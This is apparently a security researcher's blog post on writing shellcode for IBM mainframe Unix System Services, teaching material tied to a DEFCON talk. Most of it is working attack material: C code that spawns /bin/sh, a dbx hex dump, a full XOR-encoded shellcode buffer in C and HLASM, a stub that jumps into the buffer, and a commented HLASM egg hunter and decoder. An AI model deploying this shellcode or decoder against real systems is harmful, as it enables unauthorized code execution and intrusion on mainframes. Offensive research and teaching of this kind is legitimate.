Building shellcode, egghunters and decoders.

Creating shellcode on System Z (Mainframe)  Unix System Services (USS) employs the same disciplines required for the same activities on Intel platforms.   The difference lies in the syntax, assembler mnemonics, tools available, and debugging utilities.  There are certainly other ways to achieve this, and I’m still refining my favorites.  The below is one of my early successful attempts at doing so.

If you have never created shellcode from scratch, including a hand-hewn encoder for zapping bad characters, I recommend you do so on a well-documented platform.   Become familiar with using basic (but powerful tools for the task) such as dd, od, gdb and basic python scripting.

The process I followed developing shellcode for mainframe USS uses pretty common tried and true processes, using only basic tools available on the platform.   At a high level, it looks like this:

1)  Develop a working payload.   Here, for example is a simple C program that launches a shell.  Note, this program uses hard-coded strings, lengths, and pointers.  This is done to make the resulting assembler as simple as possible.  See previous posts on how to find the callable services, making this possible.

#include <string.h>
typedef void nullf();

int main(){
        unsigned int zeroint = 0;
        unsigned int sevenint = 7;
        unsigned char *zerochr = (unsigned char *)&zeroint;
        void (*Exit_routine_address)()=0;

        unsigned char *addr = 0;
        memcpy(&(addr),(addr)+16,4);
        memcpy(&(addr),(addr)+544,4);
        memcpy(&(addr),(addr)+24,4);
        memcpy(&(addr),(addr)+228,4);

        ((nullf *)addr)(
              &sevenint,
              "/bin/sh",
              &zeroint,
              *zerochr,
              *zerochr,
              &zeroint,
              *zerochr,
              *zerochr,
              &zeroint,
              *zerochr,
              &zeroint,
              &zeroint,
              &zeroint);
        return 0;
}

2) Use a C compiler that generates assembler (if you aren’t writing in HLASM to begin with) to help decide which bytes are relevant.  IBM’s metal compiler xlc used with the following options works nicely.  Note, the assembly generated here is IBM’s HLASM (High Level assembly), It is still 1 degree removed from the actual machine-language mnemonics they use to generate the 1’s and 0’s.   To get this, you have to use the debugger dbx.

xlc -S -qmetal pgm.c

3)  The primary debugger I’m using, dbx, can easily save memory dumps to a file.  These can be formatted to create simple shellcode.  Example:

0x1f175e90 (???)       90ebd00c     STM     R14,R11,12(R13)
0x1f175e94 (???)       c0f0fffffffe LARL    R15,*-4
0x1f175e9a (???)       5800f028     L       R0,40(,R15)
0x1f175e9e (???)       58f0f02c     L       R15,44(,R15)
0x1f175ea2 (???)       58e00010     L       R14,16
0x1f175ea6 (???)       58ee0304     L       R14,772(R14)
0x1f175eaa (???)       58ee00a0     L       R14,160(R14)
0x1f175eb2 (???)       a7f40007     BRC     15,*+14
...
0x1f175ec0 (???)       18fd         LR      R15,R13
0x1f175ec2 (???)       18d1         LR      R13,R1
0x1f175ec4 (???)       50f0d004     ST      R15,4(,R13)
0x1f175ec8 (???)       50d0f008     ST      R13,8(,R15)
0x1f175ecc (???)       5810f018     L       R1,24(,R15)
0x1f175ed0 (???)       41a000d8     LA      R10,216
0x1f175ed4 (???)       1ead         ALR     R10,R13
0x1f175ed6 (???)       50a0d048     ST      R10,72(,R13)
0x1f175eda (???)       c03000000077 LARL    R3,*+238
0x1f175ee0 (???)       ebebd0940026 STMH    R14,R11,148(R13)
0x1f175ee6 (???)       c0b000000075 LARL    R11,*+234
0x1f175eec (???)       41200000     LA      R2,0
0x1f175ef0 (???)       5020d080     ST      R2,128(,R13)
0x1f175ef4 (???)       41e00007     LA      R14,7
0x1f175ef8 (???)       50e0d084     ST      R14,132(,R13)
0x1f175efc (???)       41e0d080     LA      R14,128(,R13)
.......
0x1f175f00 (???)       50e0d088     ST      R14,136(,R13)
0x1f175f04 (???)       18e2         LR      R14,R2
0x1f175f06 (???)       50e0d090     ST      R14,144(,R13)
0x1f175f0a (???)       d203d090e010 MVC     144(4,R13),16(R14)
0x1f175f10 (???)       58e0d090     L       R14,144(,R13)
0x1f175f14 (???)       d203d090e220 MVC     144(4,R13),544(R14)
0x1f175f1a (???)       58e0d090     L       R14,144(,R13)
0x1f175f1e (???)       d203d090e018 MVC     144(4,R13),24(R14)
0x1f175f24 (???)       58e0d090     L       R14,144(,R13)
0x1f175f28 (???)       d203d090e0e4 MVC     144(4,R13),228(R14)
0x1f175f2e (???)       58e0d088     L       R14,136(,R13)
......
(dbx64) 0x1f175e90/0xf4h
1f175e90:  90 eb d0 0c c0 f0 ff ff ff fe 58 00 f0 28 58 f0
1f175ea0:  f0 2c 58 e0 00 10 58 ee 03 04 58 ee 00 a0 b2 18
1f175eb0:  e0 00 a7 f4 00 07 00 00 00 10 00 d8 00 00 00 06
1f175ec0:  18 fd 18 d1 50 f0 d0 04 50 d0 f0 08 58 10 f0 18
1f175ed0:  41 a0 00 d8 1e ad 50 a0 d0 48 c0 30 00 00 00 77
1f175ee0:  eb eb d0 94 00 26 c0 b0 00 00 00 75 41 20 00 00
1f175ef0:  50 20 d0 80 41 e0 00 07 50 e0 d0 84 41 e0 d0 80
1f175f00:  50 e0 d0 88 18 e2 50 e0 d0 90 d2 03 d0 90 e0 10
1f175f10:  58 e0 d0 90 d2 03 d0 90 e2 20 58 e0 d0 90 d2 03
1f175f20:  d0 90 e0 18 58 e0 d0 90 d2 03 d0 90 e0 e4 58 e0
1f175f30:  d0 88 1f 00 43 00 e0 00 58 f0 d0 90 41 e0 d0 80
1f175f40:  41 40 d0 84 41 10 d0 4c 50 40 d0 4c 18 4b 50 40
1f175f50:  d0 50 50 e0 d0 54 50 00 d0 58 50 00 d0 5c 50 e0
1f175f60:  d0 60 50 00 d0 64 50 00 d0 68 50 e0 d0 6c 50 00
1f175f70:  d0 70 50 e0 d0 74 50 e0 d0 78 50 e0 d0 7c d2 03
1f175f80:  d0 08 d0 48
(dbx64) 0x1f175e90/0xf4h > tmp.buf

4)  Format the shellcode, I use a python script for this which takes the binary name, output file name, beginning offset and ending offset.   The output can be C buffer style or assembler an assembler constant declaration, for use in another assembly program (such as the decoder used to de-obfuscate it).  This one is built with each byte XOR’d with 0x01 to remove nulls.

*Number of bytes:  240
*Enc buffer char:  0x1
*
*ASM buffer:
         DC    X'91edd10dc1f1fefefeff198ec1b10101016351d1b10519daa60401X
               06c3d6e6f0c4e6c2410101c101fefefefa16100b09510181cd59f181X
               cdc1e101010142407181e151718189407181d95171818d407181d151X
               71819151718195517181995171819d517181a1517181a5517181a951X
               7181ad517181b1517181b5517181b940'
         DC    X'11818946f181bd0101010101010101010101010101010101010101X
               01010101010101010101010101010101010101010101010101010101X
               01018101010104ee59d1b10599edd10d16fe06ff0101010101010101X
               0101010101016083889460a389010101010601010101dfacbfeef1f1X
               f1f1'

Encoded C buffer:
"\x91\xed\xd1\x0d\xc1\xf1\xfe\xfe\xfe\xff\x19\x8e\xc1\xb1\x01\x01"
"\x01\x63\x51\xd1\xb1\x05\x19\xda\xa6\x04\x01\x06\xc3\xd6\xe6\xf0"
"\xc4\xe6\xc2\x41\x01\x01\xc1\x01\xfe\xfe\xfe\xfa\x16\x10\x0b\x09"
"\x51\x01\x81\xcd\x59\xf1\x81\xcd\xc1\xe1\x01\x01\x01\x42\x40\x71"
"\x81\xe1\x51\x71\x81\x89\x40\x71\x81\xd9\x51\x71\x81\x8d\x40\x71"
"\x81\xd1\x51\x71\x81\x91\x51\x71\x81\x95\x51\x71\x81\x99\x51\x71"
"\x81\x9d\x51\x71\x81\xa1\x51\x71\x81\xa5\x51\x71\x81\xa9\x51\x71"
"\x81\xad\x51\x71\x81\xb1\x51\x71\x81\xb5\x51\x71\x81\xb9\x40\x11"
"\x81\x89\x46\xf1\x81\xbd\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x81\x01\x01\x01\x04\xee\x59\xd1"
"\xb1\x05\x99\xed\xd1\x0d\x16\xfe\x06\xff\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x60\x83\x88\x94\x60\xa3\x89\x01"
"\x01\x01\x01\x06\x01\x01\x01\x01\xdf\xac\xbf\xee\xf1\xf1\xf1\xf1"

5)  Test with a stub program, the following is a tried and true method for jumping to your buffer.

int main() {
        unsigned char sc[] =
"\x91\xed\xd1\x0d\xc1\xf1\xfe\xfe\xfe\xff\x19\x8e\xc1\xb1\x01\x01"
"\x01\x63\x51\xd1\xb1\x05\x19\xda\xa6\x04\x01\x06\xc3\xd6\xe6\xf0"
"\xc4\xe6\xc2\x41\x01\x01\xc1\x01\xfe\xfe\xfe\xfa\x16\x10\x0b\x09"
"\x51\x01\x81\xcd\x59\xf1\x81\xcd\xc1\xe1\x01\x01\x01\x42\x40\x71"
"\x81\xe1\x51\x71\x81\x89\x40\x71\x81\xd9\x51\x71\x81\x8d\x40\x71"
"\x81\xd1\x51\x71\x81\x91\x51\x71\x81\x95\x51\x71\x81\x99\x51\x71"
"\x81\x9d\x51\x71\x81\xa1\x51\x71\x81\xa5\x51\x71\x81\xa9\x51\x71"
"\x81\xad\x51\x71\x81\xb1\x51\x71\x81\xb5\x51\x71\x81\xb9\x40\x11"
"\x81\x89\x46\xf1\x81\xbd\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x81\x01\x01\x01\x04\xee\x59\xd1"
"\xb1\x05\x99\xed\xd1\x0d\x16\xfe\x06\xff\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x60\x83\x88\x94\x60\xa3\x89\x01"
"\x01\x01\x01\x06\x01\x01\x01\x01\xdf\xac\xbf\xee\xf1\xf1\xf1\xf1";

     int (*ret)();
     ret = (int(*)())(sc);
    (int)(*ret)();
    return 0;
}

Once you have working shellcode, then it’s time to remove bad characters (such as nulls 0x00) so the string can be copied across the network, piped on a command line, or read via environment variable (or whichever deployment method you choose).

Since there are no virus protection programs on the mainframe systems (yet?) simple encoding should suffice.   Here’s a stub I wrote in HLASM that finds the buffer via egg hunter (for ease of separation later).  Then, simply XORs a block of code with a static byte to yield the predetermined shellcode (which was XOR d with the same byte, prior to implementation to prevent bad characters).

The offsets will depend on buffer size and location.   The plan is to refine, then combine, this along with the scripts that build the above into a tool set that can easily generate workable shellcode.  The obtuse coding is a combo of this being an early draft and the need to not have any 00’s in the resulting object code.

    17         AFI   1,X'01010102'  # this value
    18         AFI   2,X'01010103'  # xor'd with this one
    19         XR    1,2            # yields a 1 in R1
    20         LR    4,1            #  will put a 4 in R4
    21         SLA   4,1(1)         # make R1 == 4
    22         XR    10,10          # zeroout R10 for our egg
    23         XR    2,2            # zero R2
    24         LGFI  10,X'deadbeef' # load egghunter value into R10
    25         LR    11,12          # load  base int R11
    26  LOOPER AR    11,1           # add 1 to R11
    27         L     3,1(2,11)      # retrieve value at R11 +1 indexR2=0
    28         CR    10,3           # compare egg with R11 mem pointer
    29         BRC   7,LOOPER       # branch anything but equal
    30         AR    11,4           # add 4 to R11
    31         L     3,1(2,11)      # get value R11+1 (R2 index is 0)
    32         CR    10,3           # compare egg with R11 mem pointer
    33         BRC   7,LOOPER       # 2nd check 2 in a row good to go!
    34         XR    2,2            # zero 2 for division
    35         XR    3,3            # zero 3 for division
    36         AR    11,1           # 1 for the offset from above
    37         SR    11,4           # 4 to skip last egg
    38         ST    13,4(,11)      # store sp for later in wkg area
    39         ST    11,8(,13)      # store sc addr in  wkg area
....
    42  ** Begin main decoding routine    **
    43         LR    3,11          # put egg addr in 5 - dont mod
    44         AR    3,4           # add 4 to 3
    45         AR    3,4           # add 4 to 3
    46         AR    3,4           # add 4 to 3
    47         AR    3,4           # add 4 to 3 points to SC now
    48         LR    5,3           # put egg addr in 3
    49         SR    3,1           # dec R3 by 1 (for nulls (& lulz?))
*  R3 now holds addr-1 of our sc
    50         LR    4,1           # put 1 in R4
    51         XR    1,1           # zeroout R1
    52         XR    2,2           # zeroout R2
    53  * put the XOR key (enc buffer char) from buf in the quotes below
    54         XI    1(3),X'01'    # xor byte with key (r3 offset by 1)
    55  LOOP2  AR    1,4           # add 1 to R1
    56         ARK   2,3,1         # add r3 to r1 ctr yield r2 ptr
    57  * put the XOR key (enc buffer char) from buf in the quotes below
    58         XI    1(2),X'01'    # xor byte with key
    59  * put the buffer len (# of bytes) in the next cmd in CHI 1,<here>
        * may need increase size above 256 to remove 00's from obj code
    60         CHI   1,257         # to yield sc len
    61         BRC   4,LOOP2       # loop bwd 18 bytes if R1 < size
    62         XR    4,4
......
    67         DC    X'DEADBEEF'     #egg
    68         DC    X'DEADBEEF'
    69         DC    X'DEADBEEF'
    70         DC    X'DEADBEEF'      
......
    79  *Number of bytes:     240
    81  *Enc buffer char:     0x1
    84   DC X'91edd10dc1f1fefefeff198ec1b10101016351d1b10519daa60401X
    85      06c3d6e6f0c4e6c2410101c101fefefefa16100b09510181cd59f181X
    86      cdc1e101010142407181e151718189407181d95171818d407181d151X
    87      71819151718195517181995171819d517181a1517181a5517181a951X
    88      7181ad517181b1517181b5517181b940'
    89   DC X'11818946f181bd0101010101010101010101010101010101010101X
    90      01010101010101010101010101010101010101010101010101010101X
    91      01018101010104ee59d1b10599edd10d16fe06ff0101010101010101X
    92      0101010101016083889460a389010101010601010101dfacbfeef1f1X
    93      f1f1'
.....
   100         DC    X'8BADF00D'   eof marker
   101         END

More to come on the details and inner-workings of these steps, as well as ideas about fuzzing / finding vulnerable USS apps and what to do if you find one.  Have I piqued your interest? If so make sure you see my talk at DEFCON23 on Saturday, August 8 at 5pm in Las Vegas.

Some great resources:

zArchitecture Principles of Operations

DBX debugger for UNIX

Note – the above examples are not meant to be followed as a step-by-step how-to.   Rather, they are meant to get the reader started, with ideas and examples that can easily be modified or expanded upon to create working models.